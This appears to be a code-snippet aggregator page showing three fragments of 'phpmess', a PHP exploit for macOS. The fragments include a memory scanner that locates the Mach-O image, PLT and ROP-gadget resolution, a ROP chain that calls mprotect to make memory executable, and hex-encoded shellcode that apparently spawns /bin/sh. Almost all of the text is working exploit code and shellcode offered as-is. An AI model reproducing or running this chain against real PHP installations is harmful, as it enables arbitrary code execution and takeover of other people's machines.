コード例 #1
0
function rop_findexec()
{
    $x = [];
    $p = ptr() + 0;
    for ($i = 0; $i < 0x2000; $i++) {
        array_push($x, [0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141]);
    }
    $a = map($p, 0x10000)[0];
    nogc($a);
    $a = bin2hex($a);
    nogc($a);
    $r = strpos($a, "3100000000000000100000000f0000000c000000010000000c00000000000000");
    if ($r !== FALSE) {
        $a = substr($a, $r + 0x80, 0x10);
        $a = hexdec(swapEndianness($a));
        $a = $a + 0;
        for ($i = 0; $i < 0x100000; $i++) {
            $k = map(($a & ~0xff) - 0x100 * $i, 0x8);
            if ("cffaedfe07000001" == bin2hex($k[0])) {
                return ($a & ~0xff) - 0x100 * $i + 0;
            }
        }
    }
    return FALSE;
}
コード例 #2
0
ファイル: pm_osx_shell.php プロジェクト: kjungi704/phpmess
    return ibuf($x, 8);
}
$all = alloc(4096);
$shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800");
$addr = rop_findexec();
nogc($addr);
$dlsym = getplt($addr, "_dlsym");
// get plt entry
nogc($dlsym);
$mmap_plt = getplt($addr, "_mmap");
// get plt entry
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6);
nogc($mmap);
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002");
// find b84a000002      	movl	$0x200004a, %eax -> mprotect syscall
nogc($mprotect);
function ig($a, $b)
{
    return ibuf(gadget($a, $b), 8);
}
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);
$stack .= $arg2;
$stack .= w64(4096 * 2);
$stack .= $arg3;
$stack .= w64(7);
$stack .= w64($mprotect);
$stack .= w64($all['ptr']);
コード例 #3
0
ファイル: pm.php プロジェクト: kjungi704/phpmess
function read($addr, $sz)
{
    $ret = "";
    $page = $addr & ~0xffffff;
    while ($sz > 0) {
        $rsz = min($sz, 0xffffff + 1);
        $pg = readpage($addr);
        for ($i = 0; $i < $rsz; $i++) {
            $ret .= $pg[0][($addr & 0xffffff) + $i];
        }
        $addr += $rsz;
        $sz -= 0x1000;
    }
    nogc($ret);
    return $ret;
}